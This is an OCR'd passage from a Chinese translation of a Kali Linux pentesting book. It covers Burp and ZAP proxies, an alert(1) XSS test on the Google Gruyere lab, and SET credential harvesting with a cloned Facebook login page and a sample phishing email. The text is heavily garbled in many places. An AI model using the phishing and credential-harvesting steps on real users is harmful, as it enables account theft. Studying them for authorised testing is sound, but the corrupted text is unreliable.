| @ Please Donate | | f Get FoxyProxy Plus | | (..) Buy Proxy Service | | FoxyProxy for Chrome | 
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为 了 将 代理 添加 到 FoxyProxy 中 ， 你 可 以 做 如 下 操作 : 


(1) 点 击 Add New Proxy 按 钮 ， 它 会 弹出 一 个 新 窗口 ; 
(2) 选择 Manual Proxy Configuration ; 

(3) 输入 耳 地 址 或 主机 名 ， 以 及 代理 服务 需 的 端口 号 ; 
(4) 点 击 OK 你 仓 该 代理 设置 。 


(e) Manual Proxy Confiquration 


Help! Where are settings for H IIF, 55L, FIP, Gopher, and SOCKS? 


Host or IP Address |127.0.0.1 | Port {8080 


| | SOCKS proxy? SOCKS v4/4a .*/50CK5 v5 


HERY, FoxyProxy&Ab- FAs HAN, UR Tite ARAN BET CHR ie, EU EAER , 
Completely disable FoxyProxy。 要 使 用 代理 ， 点 击 该 标签 ,将 它 切 换 成 你 要 用 的 代理 。 该 功能 使 
得 在 Firefox 中 快速 切换 代理 或 是 禁用 代理 很 方便 。 


FoxyProxy Stanc 


Select Mode: [ Completely disable FoxyProxy 
Use proxies based on their pre-defined patterns and priorities 
Use proxy "127.0.0.1:8080" for all URLs 
Use proxy "Default" for all URLs 


6.3 BURP 代理 


E BURP 


Burp{t## ( Burp Proxy ) 是 一 款 拦截 HTTP 和 HTTPS 流 量 的 工具 。 它 人 允许 渗透 测试 人 员 检 查 
某 个 应 用 、 它 的 漏洞 以 及 客户 端 和 Web 服 务 套 之 间 的 双 回 数据 流 。Burp 代 理 非 常 流行 ， 因 为 它 不 
只 能 用 来 检查 数据 流 ， 还 能 用 来 算 改 请 求 数据 。 接 下 来 我 们 会 详细 介绍 如 何 用 Burp 代 理 来 算 改 、 
回复 和 魏 取 身份 认证 信息 。 

H^c, 重要 的 是 记 住 Burp 代 理 实 际 上 是 Burp 套 件 (Burp Suite) 中 的 一 部 分 。 它 是 一 系列 
工具 的 集合 。 当 用 户 在 他 们 的 Web 浏 览 剖 中 输入 如 http:/www.DrChaos.com 的 URL 时 , 他 们 期 望 被 
重 定 回 到 该 站 上 点。 代理 服 务 郁 会 拦截 该 请 求 ， 并 代表 客户 端 发 送 该 请 求 。 代 理 服 务 需 通 疝 都 是 用 
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于 查看 数据 流 和 你 护 客 户 问 远离 恶意 数据 的 。 作 为 渗透 测试 人 员 , 你 可 以 用 代理 服务 如 拦截 来 日 
客户 闫 的 数据 流 ， 复 制 该 请 求 ， 或 自 改 它 : 


Alice 
~~ 一 
Bob 说 现在 
> 现在 是 晚上 7 点 


要 启动 Burp 套 件 , 你 可 以 浏览 Kali > Sniffing/Spoofing > Web Sniffers, 人 然后 选择 Burp Suite. 


Burp 父 件 局 动 后 ， 你 会 看 到 Burp 的 启动 主 寞 面 : 


Burp Suite Free Edition v1.5 


Burp Intruder Reseater Window Help 


| Target | Proxy | Spider | Scanner | Intruder epe 


| Site map | Scope 


Far. Hiding met found tams, hicng C55, imaga and general binary cantant; hiding 40x responses: hiding empty folders 


Hest Mati URL | Params | Sta.. à| Length | MIME type | Tele Caomrant 


ah. I Fe) 


| Request [ Response | 


Raw Hex 


E 


| ? || a | + | = | | Tne a search t D rrustc has 
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要 配置 Burp, 点 击 Proxy 标 签 。 默认 情况 下 ,Intercept 按 钮 会 在 此 标签 中 被 选中 。 当 Intercept 
选项 被 打开 时 ，Burp 会 阻止 所 有 从 Web 浏 览 絮 发 往 Web 服 务 器 的 所 有 请 求 。 渗 透 测 试 人 员 可 以 在 
查看 请 求 后 人 工 允 许可 以 继续 的 链接 。 


Intercept 按 钮 需要 人 工 干预 ,否则 请 求 永远 也 不 会 到 达 Web 服 务 器 。 


下 一 个 能 看 到 的 配置 设置 是 Options 子 腔 单 。 本 贡 会 允许 用 户 检查 或 修改 Burp 运 行 的 默认 端 
口 ， 并 配置 Burp 可 以 看 到 的 网 卡 或 网 络 。 默 认 情 况 下 ，Burp 会 被 射程 运行 在 本 地 环 回 网 卡 上 ， 如 
下 面 的 截图 所 示 。 环 回 网 卡 是 一 个 特殊 的 网 卡 接 口 ， 通 稼 会 跟 127.0.0.1 这 个 了 地 址 关联 。 它 并 没 
有 跟 它 绑 定 的 物理 便 件 连接 ， 而 只 是 操作 系统 引用 目 己 的 一 种 方式 。 换 名 话说 ， 当 你 要 在 网 络 中 
跟 目 己 通 信 时 ， 可 以 用 环 回 。 如 果 你 计划 在 本 地 机 需 外 测试 Burp 套 件 ， 需 要 添加 以 太 网 卡 接 口 和 
IP 地 址 。 


在 这 个 例子 中 ， 我 们 会 采用 环 回 网 卡 接口 : 


(?| Proxy Listeners 
Im Burp Proxy uses listeners to recerve incoming HTTP. requests from your browser. You will need to configure your 
| Running Interface Invisible Redirect Certificate | 


[4] 127.0.0.1:8080 [J Per-host 
| 


| Remove | 


下 一 步 是 对 浏览 需 进 行 配 置 , 使 其 使 用 Burp 套 件 。 MAN at CRS aA PR 
方式 。 在 下 一 个 例子 中 ， 我 们 会 描绘 一 下 在 Firefox 上 对 配置 进行 设置 的 过 程 ， 见 下 页 图 。 

下 面 的 这 个 例子 中 , 我 们 将 会 在 Firefox 中 访问 一 个 URL， 比 如 www.DrChaos.com。 你 会 观察 
到 什么 也 没 发 生 。 这 是 因为 默认 情况 下 拦截 功能 是 启用 的 ， 如 我 们 在 前 面 所 说 。 现 在 你 能 在 Burp 
中 看 到 Intercept 标 签 的 颜色 改变 卫 ， 说 明 已 经 有 一 个 新 请 求 被 拦截 了 了。 
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Configure Proxies to Access the Internet 
Ma proxy 
J Auto-detect proxy settings for this network 
Use system proxy settings 
= Manual proxy configuration: 
HTTP Proxy: | 127.0.0.1 Port: 


Use this proxy server for all protoccls 


SSL Proxy: | Port 


FTP Proxy: | 
SOCKS Host: | 


SOCKS v4 ® SOCKS v5 


Mo Proxy for: 


localhost, 127,0.0.1 


Example: .mozilla.org, .net.nz, 192.168.1.0/24 


Automatic proxy configuration URL: 


在 你 点 击 Intercept 标 签 时 , 你 能 看 到 该 请 求 的 详情 。 现 在 你 可 以 点 击 Forward 或 Drop 来 允许 
或 拒绝 该 请 求 是 否 继续 : 


Target | Proxy | Spider Intruder | Repeater | Sequencer | Decoder | Comparer | Options 


| Intercept | History | Options 


Request to http://www. drchaos.comc80 [50.87.145.132] 


| Forward | | Drop | | Intercept is on 
Params 


ET / HTTPJ1.1 
ost: www.drchaos.com 
ser-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1 
ccept: text/html.application/xhtml--xml,application/xml;q- 0.9,*/*;32 0.8 
ccept-Language: en-US,en;q- 0.5 
ccept-Encoding: gzip, deflate 
ookie: qca=P0-886080433-1368803092505;  atuvcz3967C20 
Connection: keep-alive 


在 你 点 击 Forward 按 钮 时 ， 你 会 看 到 请 求 会 继续 发 往 服务 器 ， 以 及 从 服务 器 返回 的 响应 。 还 
有 ， 你 应 该 能 在 web 浏览 器 中 看 到 该 网 页 成 功 加 载 了 。 有 些 Web 页 面 有 多 个 模块 ， 这 样 你 可 能 需 
要 多 次 选择 Forward 按 钮 ，Web 页 面 才 能 完全 加 载 。 


男 一 个 很 酷 的 功能 是 Burp 息 虫 。 Burp 疏 虫 提供 了 以 自动 化 方式 将 Web 应 用 的 请 求 关 系 映射 出 
来 的 一 种 途径 。Burp 扑 虫 工 作 的 原理 是 你 先 设置 Burp 来 作为 因特网 连接 代理 ,如 我 们 在 前 面 介 绍 
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取 所 有 截获 的 请 求 以 找 出 新 目标 的 功能 。 
要 使 用 爬虫 ， 点 击 Spider 标 签 进入 默认 配置 页 面 。 点 击 Spider is paused 按 钮 ， 将 其 状态 改 为 


Spider is running: 


 Burp iniruder Repeater Window Help. 


Spider Matus 


Use these settings to monitor and contro Burp Spider, To begin spidering, browse to the target application, then right-click one or mare nodes in the target site map, and 
choose “Spider this hast / branch’. 


| Spider is paused | | Clear queues | 
Requests made: Ü 


Bytes transferred: Ü 
Requests queued. 0 
Forms queued: ü 


Spider Scope 


(9 Use suite scope [defined in Target tab| 


Ū Use custom scope 


Burp 会 将 代理 看 到 的 所 有 请 求 都 映射 到 Target 标 签 下 。 点 击 Target 标 签 来 看 看 它 都 截获 了 哪 
些 请 求 。 它 会 显示 一 个 代理 上 在 用 的 目标 列表 。 灰 色 URL 代 表 你 并 没有 直接 浏览 这 些 目标 ， 而 黑 
色 UREL 则 是 直接 浏览 的 那些 站 点 : 


[ Proxy | Spider | scanner | intruder | Repeater | Sequencer | Decoder | Comparer | Options | alerts 


Filter: Hiding not found items; hiding C35, image and general binary content; hiding 4xx responses; hiding empty folders 
* B https anis google.com | ' | MIME type | Title 
http-/ i ctl addthis.com http; 305.6. i i L 200 T . HTML ag 
+ hnpfdelicious.com http //wWw.drchaos.c.. GET jabaut-me/ HTML 
pom http:/ www.drchabs.c... I favicon.ico 
* htp: edge http: 'eww.drchans.c... /wp-includes /js/com... 
= http. //edge.quantserve.com http /www.drchaos.c... | wp-content/ plugins; ... 
F ntm feedburner google.com hep j jeran tire haos C jwp-content/themes /... 
http: Peww.drchaos.c... wp-cantent /Thermes /... 
http. / /www.drchaos.c... Jwp-content/themes /... 
http:/ wwwww.drchaps.c... i lwp-content/ themes /... 
hip: ww. drchaos e... [ Pap-cantent/ themes | 
http: / eww,drchaos.c.. wp-content/themaes / 


script 
script 


b http. / (feeds feedburner.cam 
P http. / /friendfeed.com 

+ http-//getfoxyproxy.org 

F hitp://gmpg.org 


DODODOBEDC 
2 
y 


& hitp./ /hmmisshim.googlecade.carr 
* hitp-//m.addthis.cam 
+ hitp./ / platform. rwitter.com 
e B https //plus.google.com 
E http //s.gravatar.com 3 zn Response | — i | 
E http stap eom | 
* hitp-//57.addthis.coam 
b B https í/secure GET / EIIP/l.1 
b http-/Jsecurs hostqator. com Host: www.drchaos.com 
http:/ / static .ak fbcdn.net User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OB X 10.8; rv:21.0) 
Gecko/20100101 Firefox/21.0 
Accept: text/html,application/xhtmlexml,application/xml;qe0.9,*/*;q-0.8 
Accept-Language: en-US,en;qe0.5 
i Bi hts] patiar corn Accept-Encoding: gzip, deflate 
i bun Ja nd pss vbi Cie ig pa en 25R2C1R7CL6; — qcasPOU-20852698058-1370845566215 
aiat La m Connection: keap-alive 
| htp/www.drchaos.com 一 | Cache-Control: Mea 
. http: / www. facebook com 
E Aip wees reddir.cam 


e 
" 
kal 
o 
Ji. 
= 
hal 
=j 


E 


H http / (stats wordpress.com 
* http-/ /themes.googleusercontent.com 
b http: / (patter com 


P hip: 'wvew.stumbieupon.com 


b hitp / ave w3.arg 


184 € 63x Web + 


要 使 用 Spider 功能 ， 右 键 点 击 某 个 目标 ， 并 选择 Spider this host: 


http:/ www.drchags.com REEL e, DL ie 
E http-/ /www.facebaak.com http: / www.drchaar.com)/ 


Add to scope 


k 
b ntt 
E 


Spider this hast 


Engagement tools [Pro version only] 
Compare site maps 

Expand branch 

Expand requested inem 

Delete host 

Copy URLs in this hast 

Copy links in this Mmasi 

Save selected items 


Site map help 


当 你 在 Burp 中 访问 Spider 标签 时 , 你 会 注意 到 Spider Status 计 数 已 经 从 0 变 成 了 一 个 办 加 的 


数字 : 


B 


Spider Status 


Jse these settings to monitor and control Burp Spider. To begin spidering, browse to the target application, then right-click one or more nodes in the target site map, and 
choose "Spider this host / branch” 


Spider is running | Clear queues 


Requests made G27 
3ytes transferred: 23,833,252 
Requests queued: 3,237 


Forms queued 0 


只 要 Burp 遇 到 了 任何 表单 , Eb ToS WHO Re NET]. WR SE I XP, Burp 
ASESOR T TE de eC H3 vi ÉL EET : 


Burp Spider - Submit Form 


Burp Spider needs your quidance to submit a login form. Please choose the value of each form field which should be used when 
submitting the form. You can control haw Burp handles forms in the 5pider options tab. 


Action URL:  http:/ /www.drchaos.com/wp-login.php 
Methad: FOST 


Type Name 


Checkbox rememberme 
Hidden testcookie 


Password pwd MyPasswordl 


Submit wp-submite Log In 
Hidden redirect to http: /www.drchaa 
Text log 


| Submit form | lgnore form | 
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FEARS, Kl Targets, REVIT UREA EOL. Ad EDL WAY = 
FI RIFE. TRAHEBOERI Atty FAIMA EZR : 


b http:/ /www.cloudcentrics.com 

http:/ /www.drchaos.com 

"Wu | 
4-reasons-not-to-use-mod security 
J4-l1x-as-a-government-standard 
802-1x-challenges -for-the-department-of 
aamir-lakhani-talks-about-byod 
about-me 
about-us 
already-in-the-cloud-is-it-too-late 
asa-scripted-install 
author 
basic-man-in-the-middle-attack-den 
beef inti 
breach-identified-next-steps 
breaking-wpa2 -psk-with -kali 
Dyo-destruction 
byod-opens-doors-for-employers-employei 
category 


cisco-content-security-cx-and-ironport 


ITT COPPER 


risco-cyber-solutions 


CISCO-ISE 1 0 4 overview 


» "E 
| 


continuousmonitoring 


creating-custom-certificate-signing-reques! 


iii 


data-backup-in-2013-tips-for-smb-cloud-: 


E 
| 


Teer ere eee 0 1 


defending-against-google-hacking-know-wi 
disaster-at-hand-what-does-it-mean 
dissecting-the-meraki-cloud 

ditch -the-moving-parts 
ensuring-your-emails-dont-lead-to-a-majo 
everyone-is -going-mobile 

feed 

foca intro 
goin-mobile-making-your-site-Taster-Tor 
great-reasons-to-adopt-erp-solutions-on 


hacking9-magazine-nmap-quide 


how-to-crack-passwords 
how-to-educate-vour-employees-about-5o 
how-to-hack-and-elevator 
implementing-scap-for-the-enterprise-anc 
installing-vmware-tools -on-kali-linux 


introduction-to-cloud-marketing 


» 
» 
b 
b- 
P 
aa 
E 
» 
P 
b 
b 
» 
| 
E 
be 
» 
b- 
* 
» 
P 
a 
» 
» 
i 
» 
» 
i 
| 
r 
b 
| 
b 
b 
a 
» 
» 
» 
|. 
b 
b 


iphone sms dump. demo 


Burpiban f BO PARRA A vie. EAR, XS RAR A ae. Web H FEI, 
子 目 录 和 Java 人 代码。 下 一 个 例子 显示 的 是 www.DrChaos.com 站 点 上 稚 获 的 多 个 子 目录 。 


Burp 能 够 用 页 面 上 方 的 灰色 Filter 横 条 来 过 滤 下 方 的 条 目 。 在 你 点 击 Filter 按 钮 时 ， 它 会 展开 
可 以 用 于 过 小结 末 的 可 用 选项 : 
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Burp intruder Repeater Window Hilo 


| Target Proxy | Spider | Scanner | iniruder | Repeater | Sequencer | Decoder | Comparer | Options 


| Site i | Scope | 


Fetter: Hiding nat found kema; hiding C55, image and general binary content: hiding sxx responded: hiding empty Talders 
i MIRE type Title 

HTML 4reasons not 
C 5haw only in-scope items wj HTML w Oder texi m] 2xx [success] i] Hide eemqty folder ARAL 


Filter by request type Filter by MIME type Filter by status cede Folders 


| Show only requested kemi a) Script | Images [4 3xw [redi ecien] 
| Show only narameterised requests a] RHL Dp Flash Lj áxx [request errar] 
[4] Hide not-found items L] C55 |] Other binary Er 


Filter by search term [Pra only Filter by file extension 


| 5haw oni commented items 


Lj Bhgi omt h igt lighted PLES 


Show al Hide all 


Burp 中 的 Spider 选 项 允许 Web 渗 透 测 试 人 员 查 看 攻 个 Web 应 用 或 网 站 是 如 何 配 置 的 ， 包含 哪 
些 链 接 ， 以 及 这 些 链 接 指向 哪里 。 这 个 概念 就 好 比 站 在 一 间 有 很 多 局 门 的 房间 内 ,而 你 要 具备 能 
同时 探索 每 局 门 的 能 力 。 


6.4 OWASP (ZAP) 


ZAP 是 一 个 使 用 简便 的 集成 渗透 测试 工具 ， 用 于 找 出 Web 应 用 中 的 漏洞 。 我 们 在 第 3 草 中 有 
关 扫 描 目标 上 洪 在 的 漏洞 的 内 容 里 简要 地 介绍 过 如 何 使 用 ZAP。 让 我 们 在 找 出 和 利用 跨 站 脚本 
(常用 XSS 来 指 代 ) 漏洞 部 分 时 ， 再 温习 一 下 ZAP。 

ZAP 是 Kali Linux 1.0 中 内 建 的 工具 。 你 可 以 浏览 Sniffing/Spoofing > Web Sniffers， 然 后 选择 
Owasp - ZAP 来 运行 它 ， 或 是 简单 地 打开 一 个 终端 窗口 ， 输 入 zap， 如 下 方 的 例 图 中 所 示 : 


Lr Zap 
Using Java version: 1.7.0 03 
Available memory: 755 MB 
Setting jvm heap size: -Xmx128m 


158 [main] INFO org.zaproxy.zap.ZAP - OWASP ZAP 2.1.0 started. 
Jun 20, 2013 11:10:50 PM java.util.prefs.FileSystemPreferences$1 run 
: Created user preferences directory. 


下 面 是 对 搭建 ZAP 以 及 将 其 和 Firefox 一 起 使 用 的 总 结 ， 如 第 3 章 中 介绍 的 。 


(1) 接受 用 户 使 用 协议 。 

(2) 生成 一 个 SSL 证 书 或 是 导 和 人 已 有 证 书 。 

(3) 将 证 书 导 入 到 Web 浏 哆 带 中 ， 如 Firefox; 你 可 以 访问 偏好 设置 > 高 级 ,然后 选择 加 窗子 
标签 。 

(4) 点 击 View Certificate， 导 入 该 证 书 。 
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(5) 勾 选 跟 使 用 新 证 书 有 关 的 所 有 信任 选项 。 

(6) 将 Web 浏 览 絮 设 为 使 用 ZAP 作 为 默认 代理 。 在 Firefox 中 ， 你 可 以 在 偏好 设置 > 高 级 > 网 
络 中 设置 。 

(7) 输入 代理 服务 融 localhost 和 端口 号 8080， 也 就 是 ZAP 代 理 的 默认 端口 。 

(8) 将 所 有 协议 部 勾 选 使 用 代理 服务 如 。 


| 在 使 用 ZAP 之 前 ， 你 需要 生成 一 个 证 书 。 


ZAP 和 Firefox 配 置 好 后 ， 在 Firefox 中 加 载 任意 URL。 你 能 看 到 网 站 现在 会 出 现在 ZAP 的 Sites 
标签 页 中 。 在 这 个 例子 中 ,我 们 会 访问 www.DrChaos.com 并 注意 到 我 们 已 经 加 载 了 一 些 网 站 ， 这 
是 因为 www.DrChaos.com 主 页 上 的 所 有 链接 。 


c P http://s.gravatar.com 
P3 http: //s0.wp.com 
Pr http: //s7.addthis.com 


— http: / /seqment-pixel.invitemedia.t 
> ES P http: //stats.wordpress.com 
H3 http: //tacoda.at.atwola.com 


http: //themes.googleusercontent.c 
http: / /tracking.hostgator.com 

™ http: / /www.drchaos.com 

mu http: / /www.facebook.com 

F" https://apis.google.com 

Fo https: //platform.twitter.com 


ZAP A ^ USE UE E EIR EBT BS Ati. BANAT AST, SEI 
Web/w JHis 1 rlw Ae KEN. ESJAR — Er, 并 会 主动 针对 Web 应 用 运行 一 些 代码 ， 
它 可 能 会 触发 特定 安全 防御 产品 的 警报 猴 置 。 


下 面 的 例子 会 同时 使 用 主动 扫描 和 被 动 扫 描 。 最 好 是 能 够 自己 搭建 一 个 可 供 测 试 的 Web 服 务 
句 ， 而 不 是 用 ZAP 在 非 授 权 的 Web 服 务 器 上 乱 试 。 由 于 我 们 想 在 已 授权 的 带 有 漏洞 的 Web 服 务 需 
上 上 练习， 我 们 会 回去 继续 用 Google Gruyere 项 目 。 


谷歌 是 将 Gruyere 项 目 作 为 测试 Web 应 用 的 漏洞 利用 和 防御 的 一 种 途径 创建 的 。Gruyere 项 目 


Fdo oe E ECTS, 包括 XSS。 你 可 以 运行 你 目 己 的 线 上 Gruyere 项 目 ， 或 者 你 也 可 以 将 它 
下 载 到 一 个 本 地 机 符 用 于 测试 : 
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Web Application Exploits and Defenses 


A Codelab by Bruce Leban, Mugdha Bendre, and Parisa Tabriz 


创建 你 自己 的 Gruyere 实 例 来 测试 ZAP。 在 测试 时 ， 你 会 拿 到 一 个 自己 的 唯一 URL。 我 们 拿 
到 的 URL 是 http://gsoogle-gruyere.appspot.com/326352883334/。 


我 们 回 到 ZAP 中 ， 对 上 面 的 链接 做 个 快速 扫描 : 
| © Quick Stat | = Request €» Response A Break | 
Welcome to the OWASP Zed Attack Proxy (ZAP) 


ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applice 


Please be aware that you should only attack applications that you have been specifically been giv 


To quickly test an application, enter its URL below and press ‘Attack’. 


URL to attack: http://google-gruyere.appspot.com/326352883334/ 
多 Attack) E Stop 


Progress: Attack complete - see the Alerts tab for details of any issues found 


For a more in depth test you should explore your application using your browser or automated re 


= History A Search — X Break Points Fë Alens ~ > Active Scan ENTM 4^ Forced Browse @ Fuzzer t. ] Params 


100% Current Scans: 0 | URIs Found: 71 


URI Flags 

http:/ /google-gruyere.appspot.com/ 326352883334/ editprofile.gtl SEED 

http:/ /google-gruyere.appspot.com/326352883334/logout SEED 

http:/ /google-gruyere. appspot.com/ 326352883334/newsnippet2?snippet SEED 

http:/ /google-gruyere appspot.com/ 326352883334/upload2 SEED 

http:/ /google-gruyere.appspot.com/ 326352883334/saveprofile?action=updateécolor=ZAP&icon=ZA... SEED 

http:/ /google-gruyere apps pot.com/ 326352883334/ invalid 
http:/ /google-gruyere appspot.com/ 326352883334/ 

http:/ /news.google.com/news / search?q»brie OUT OF SCOPE 
http: / /google-gruyere.appspot.com/326352883334/snippets.gtl?uid» cheddar 

http. / /images.google.com/images?q* cheddarX2Bcheese OUT OF SCOPE 
http-/ /google-gruyere.appspot.com/326352883334/snippets.gtl"uid 

http: / /google-gruyere.appspot.com/326352883334/ZAP 


Alerts WO MO R3 应 2 Current Scans À 1 


截图 的 例子 中 显示 的 是 一 些 种 子 文 件 , 包括 有 个 标签 很 有 趣 的 : http://google-gruyere.appspot. 
com/326352883334/invalid. 


RES ER TEU Dia PY, RISEREU PSE AS, : 
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SDB- — ! = [an wm prima 
CD 9 D Gruyere: Error FA T E. LE, Soe a D (> s) may Ca) I. wW ” a 


和 C! |ì google-gruyere.appspot.com/326352883334/invalid 


Home 


Invalid request: /invalid 


TEXSS'P, URL'PGscG s EPP ESAS, WRASSE PT CE IR LEAST V 
用 在 页 面 中 插入 他 期 望 的 内 容 , 那么 它 就 打开 了 可 用 于 注入 恶意 脚本 的 大 门 。 这 里 有 一 些 其 他 有 
趣 的 种 子 文件 : 


= || google-gruyere.appspot.com/326352883334/>< 


Invalid request: >< 


| | google-gruyere.appspot.com/ 326352883 334/%cO%be%cO%be 


Gruyere System Alert 


Exception: 


C [5 google-gruyere.appspot.com/ 326352883334 /%26gt;%26lt 


Invalid request: >< 


这 里 有 个 利用 这 些 种 子 链接 中 的 某 个 来 注入 脚本 的 例子 。 我 们 会 创建 一 个 URL， 然 后 加 上 
alert (1) 脚 本 来 看 看 网 站 是 否 会 创建 一 个 弹出 的 错误 : 


http://google-gruyere.appspot.com/326352883334/ 
<script>alert (1); 
</script> 
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@ google-gruyere.appspot.com/326352883334/ 


<script>alert(1)</script> 


一 -一 一 一 一 一 === =a bal 一 一 PT 
it -- [o A Wi ^r Nga do a en a ck len’ tie tae T r a a ee — as 
Started Time Gri iCloud | | Tech = FT hical Hackin ip ad "Pi 4 Bookm 4 
上 ron J 
r x 


这 个 例子 显示 我 们 的 目标 Web 应 用 服务 器 会 调用 一 个 弹出 框 ， 证 明 这 个 站 点 是 有 机 可 乘 的 。 
我 们 可 以 用 ZAP 来 回放 该 攻击 ， 尝 试 其 他 攻击 或 是 测试 类 似 的 XSS 方 法 。 


我 们 建议 你 好 好 观摩 一 下 你 发 现 的 错误 ,看 看 你 是 否 能 在 渗透 测试 练习 中 做 一 些 修 改 来 输出 
敏感 信息 。Gruyere 项 目 是 使 用 ZAP 来 练习 找 出 其 他 漏洞 的 绝 佳 途径 。 


为 了 防御 远程 攻击 ，ZAP 特 别 适合 测试 Web 源 洞 ， 如 XSS 攻 击 。 有 些 人 认为 如 来 浏览 带 标 称 
它 具 备 防 御 跨 站 脚本 攻击 的 功能 , 那么 用 户 在 浏览 网 站 时 束 不 必 关 心 XSS。 这 人 句 话 背后 的 事实 是 ， 
你 并 不 能 完全 信任 浏览 副 的 保护 功能 ， 因 为 浏览 带 并 不 知道 Web 应 用 背后 的 代码 到 底 有 多 安全 。 
聪明 的 尘 客 有 可 能 会 避 开 那些 保护 ,比如 对 用 户 用 来 访问 网 站 的 主机 进行 XSS 源 洞 利 用 和 脚本 调 
用 。 保护 服 务 大 和 客户 端的 最 佳 实践 是 用 类 似 ZAP 的 工具 找 出 源 洞 并 修复 漏洞 。 


6.5 SET 密码 收集 

我 们 在 第 4 草 中 介绍 了 社会 工程 工具 集 (SET, Social Engineering Toolkit ) 的 一 些 基 本 概念 。 
这 里 我 们 会 继续 回 到 SET， 并 看 看 有 关 密 码 收 集 和 获取 特权 信息 的 一 些 高 级 知识 。 

作为 知识 刷新 ， 我 们 会 浏览 Exploitation Tools > Social Engineering Tools > se-toolkit 来 启动 
SET. 


确保 SET 更 新 到 了 最 新 版 本 ， 如 宁 是 首次 使 用 的 话 。 更 新 SET 工具 及 验证 Git 是 否 已 安装 的 步 
又 可 以 在 第 4 章 中 找到 。 
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在 SET 克隆 网 站 时 ， 它 会 运行 一 个 Web 服 务 器 。 重 要 的 是 你 的 目标 对 象 能 够 
> 连 到 你 的 Web 服 务 器 上 。 这 意味 着 任何 基于 因特网 的 攻击 都 需要 用 到 一 个 公 网 IP 
3 " (不管 是 通过 NAT 还 是 直接 在 Kali Linux 上 配置 )， 并 要 放 开 防火 墙 规则 以 便 

远程 位 置 连 接 到 Kali 上 。 


完成 耳 配置 工作 之 后 ， 你 就 可 以 局 动 SET 了 : 
:/usr/share# cp backup.set/config/set config set/config/set config 
:/usr/share# se-toolkit 


IMPORTANT NOTICE! The Social-Engineer Toolkit has made some significant 
changes due to the folder structure of Kali and FSH (Linux). 


All SET dynamic information will now be saved in the ~/.set directory not 


in src/program junk. 


[!] Please note that you should use se-toolkit from now on. 

[!] Launching set by typing 'set' is going away soon.. 

[!] If on Kali Linux, just type ‘se-toolkit' anywhere... 

[!] If not on Kali, run python setup.py install and you can use se-toolkit anywhere.. 


Press (return) to continue into Sam | 


我 们 现在 用 SET 来 收集 密码 。SET 能 殉 隆 任何 网 站 。 在 这 个 例子 中 ， 我 们 实际 上 会 让 它 克隆 
最 受 欢 迎 的 一 个 社会 工程 网 站 。 同 意 用 户 授权 协议 后 ， 你 就 能 看 到 SET 的 主 界面 了 : 


root@kali: ~ 
Edit View Search Terminal Help 
> SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 


The above licensing was taken from the BSD licensing and is applied to Social-En 
gineer Toolkit as well. 


Note that the Social-Engineer Toolkit is provided as is, and is a royalty free 
pen-source application. 


to modify, use, change, market, do whatever you want with it as Long a 
RE the eppropis late hogan where erect. 


Also note that by using this pum N if you ever 

the creator of SET in a bar, you should give him a hug and buy him a beer. 
ug must last at least 5 seconds. Author 
holds the right to refuse the hug or the beer. 
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我 们 建议 选择 选项 5, 在 使 用 SET 前 先 对 其 进行 更 新 以 便 用 的 是 最 新 的 版 本 。 
M 如 果 你 得 到 了 一 个 错误 ， 说 Git 仓 库 不 存在 ， 你 可 能 没有 正确 安装 Git， 或 是 写作 
Q 本 书 时 的 步骤 已 经 改变 。 请 参考 本 书 出 版 商 的 网 站 ， 或 是 Aamir Lakhani 位 于 
www.DrChaos.com 的 博客 ， 或 是 Joseph Muniz 位 于 www.thesecurityblogger.com 的 

博客 来 了 解 更 多 有 关 在 Kali Linux 上 使 用 SET 的 技巧 。 


(D SET 被 更 新 后 ， 选 择 选 项 1 来 进行 社会 工程 攻击 。 
(2) 选择 选项 ?来 选择 网 站 攻击 路 径 。 
(3) 选择 选项 3 来 进行 凭据 收集 者 攻击 。 


有 关 如 何 殉 隆 网 站 你 可 以 有 一 些 选择 。SET 为 流行 站 点 提供 了 模板 ， 比 如 Facebook 和 Gmail。 
有 时 这 些 模板 会 无 法 工作 ， 不 过 我 们 建议 以 这 些 模板 开始 使 用 SET， 或 是 克隆 其 他 站 点 。 要 克隆 
一 个 网 站 ， 你 需要 提供 一 个 URL，SET 会 自动 尝试 克隆 它 。 


如 果 你 已 经 元 隆 了 一 个 网 站 ,或 是 在 Kali 中 加 载 THTML 文 件 ， 可 以 选择 定制 嘻 和 人 。 当 选择 
此 选项 时 ， 你 需要 告诉 Kali 这 些 HTML 文 件 存储 在 本 地 文件 系统 的 什么 位 置 。 


在 这 个 例子 中 ， 我 们 选择 使 用 Web 模 板 。SET 会 询问 它 要 监听 哪个 人 P 地 址 。 这 个 IP 地址 应 该 
是 Kali Linux 上 的 那个 网 卡 的 。 有 一 种 例外 情况 是 当 在 防火 墙 上 使 用 NAT 时 。 那 种 情况 下 ， 你 需 
要 使 用 NAT 或 是 公 网 JP 地 址 ,而 不 是 Kali Linux 的 IP 地 址 ,这 样 目 标 才 能 访问 系统 。 下 一 个 例子 将 
使 用 本 地 环 回 地 址 127.0.0.1。 


下 一 步 ，SET 会 询问 你 要 选择 哪个 模板 。 在 这 个 例子 中 ， 我 们 选择 Facebook。 


下 一 个 例子 显示 的 是 一 个 Web 浏 览 器 访问 了 127.0.0.1， 并 显示 了 我 们 伪造 的 Facebook 页 面 。 
如 果菜 个 模板 页 面 看 起 来 不 太 对 荔 ， 你 可 能 要 用 其 他 模板 ,或 是 克隆 要 用 的 页 面 : 


Welcome to Facebook - Log In, Sign Up or Learn More - Icewease 
File Edit View History Bookmarks Tools Help 
Ki Welcome to Facebook - Log In, … | &P 
e [2 127.0.0.1 v @) (B 


EzMost Visitedv PiJOffensive Securi ty "Kali Linux "Kali Docs KliExploit-D8 W Aircrack-ng 


Sign Up 
onnect with friends and the It’s free and always will be. 
orld around you on Facebook. 


See photos and updates from friends in! 


Share what's new in your life on your Timeline 
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主意 ， 我 们 的 地 址 栏 显示 的 是 127.0.0.1。 ， 你 需要 用 其 他 攻击 路 径 来 诱导 用 户 访 问 你 的 
m 。 有 很 多 种 办 法 可 以 实现 此 目的 ， ME EM Ferne 时 的 电邮 和: 


Facebook <wwt.secmob@gmail.com> 


Facebook 


Dear Facebook user, 


In an effort to make you online experience safer and more enjoyable, Facebook will be implementing a 
new login system that will affect all Facebook users. These changes will offer new features and 
increased account security. 


Before you are able to use the new login system, you will be required to update your account. 


Please click on the link below to update your account online now 
If you have any questions, reference out New User guide. 


Thanks, 
